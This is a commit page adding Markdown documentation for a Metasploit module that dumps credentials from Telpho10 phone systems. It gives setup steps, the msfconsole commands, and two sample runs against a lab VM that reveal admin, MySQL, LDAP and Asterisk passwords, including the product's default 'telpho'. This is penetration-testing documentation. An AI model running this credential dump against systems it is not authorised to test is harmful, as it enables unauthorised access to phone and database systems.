Skip to content

Commit 991a3fe

Browse files
committed
Markdown docs added.
1 parent 971c820 commit 991a3fe

File tree

2 files changed

+133
-1
lines changed

2 files changed

+133
-1
lines changed
Lines changed: 132 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,132 @@
1+
## Vulnerable Application
2+
3+
Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
4+
5+
Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
6+
7+
## Verification Steps
8+
9+
The following steps will allow you to install and dump the credentials from a Telpho10 instance:
10+
11+
1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
12+
- note that the ISO will default to a German keyboard layout
13+
1. configure the Telpho10's IP address
14+
- edit /etc/networks/interfaces accordingly
15+
1. Start msfconsole
16+
1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
17+
1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
18+
1. Do: ```run```
19+
1. You should see a list of the retrieved Telpho10 credentials
20+
21+
## Scenarios
22+
23+
Example output when using this against a Telpho10 v2.6.31 VM:
24+
25+
```
26+
$ ./msfconsole
27+
28+
# cowsay++
29+
____________
30+
< metasploit >
31+
------------
32+
\ ,__,
33+
\ (oo)____
34+
(__) )\
35+
||--|| *
36+
37+
38+
=[ metasploit v4.12.36-dev-16fc6c1 ]
39+
+ -- --=[ 1596 exploits - 908 auxiliary - 273 post ]
40+
+ -- --=[ 458 payloads - 39 encoders - 8 nops ]
41+
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
42+
43+
msf > use auxiliary/admin/http/telpho10_credential_dump
44+
msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
45+
RHOST => 10.0.2.35
46+
msf auxiliary(telpho10_credential_dump) > run
47+
48+
[*] Generating backup
49+
[*] Downloading backup
50+
[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
51+
[*] Dumping credentials
52+
53+
[*] Login (/telpho/login.php)
54+
[*] -------------------------
55+
[+] Username: admin
56+
[+] Password: telpho
57+
58+
[*] MySQL (/phpmyadmin)
59+
[*] -------------------
60+
[+] Username: root
61+
[+] Password: telpho
62+
63+
[*] LDAP (/phpldapadmin)
64+
[*] --------------------
65+
[+] Username: cn=admin,dc=localdomain
66+
[+] Password: telpho
67+
68+
[*] Asterisk MI (port 5038)
69+
[*] -----------------------
70+
[+] Username: telpho
71+
[+] Password: telpho
72+
73+
[*] Mail configuration
74+
[*] ------------------
75+
[+] Mailserver:
76+
[+] Username:
77+
[+] Password:
78+
[+] Mail from:
79+
80+
[*] Online Backup
81+
[*] -------------
82+
[+] ID:
83+
[+] Password:
84+
85+
[*] Auxiliary module execution completed
86+
msf auxiliary(telpho10_credential_dump) >
87+
```
88+
89+
I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
90+
91+
```
92+
msf auxiliary(telpho10_credential_dump) > run
93+
94+
[*] Generating backup
95+
[*] Downloading backup
96+
[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
97+
[*] Dumping credentials
98+
99+
[*] Login (/telpho/login.php)
100+
[*] -------------------------
101+
[+] Username: admin
102+
[+] Password: s3cr3t
103+
104+
[*] MySQL (/phpmyadmin)
105+
[*] -------------------
106+
[+] Username: root
107+
[+] Password: telpho
108+
109+
[*] LDAP (/phpldapadmin)
110+
[*] --------------------
111+
[+] Username: cn=admin,dc=localdomain
112+
[+] Password: ldaps3cr3t
113+
114+
[*] Asterisk MI (port 5038)
115+
[*] -----------------------
116+
[+] Username: telpho
117+
[+] Password: asterisks3cr3t
118+
119+
[*] Mail configuration
120+
[*] ------------------
121+
[+] Mailserver:
122+
[+] Username:
123+
[+] Password:
124+
[+] Mail from:
125+
126+
[*] Online Backup
127+
[*] -------------
128+
[+] ID:
129+
[+] Password:
130+
131+
[*] Auxiliary module execution completed
132+
```

modules/auxiliary/admin/http/telpho10_credential_dump.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -49,7 +49,7 @@ def untar(tarfile)
4949
File.open(dest, 'wb') do |f|
5050
f.write(entry.read)
5151
end
52-
File.chmod(entry.header.mode, dest)
52+
File.chmod(entry.header.mode, dest)
5353
end
5454
end
5555
end

0 commit comments

Comments
 (0)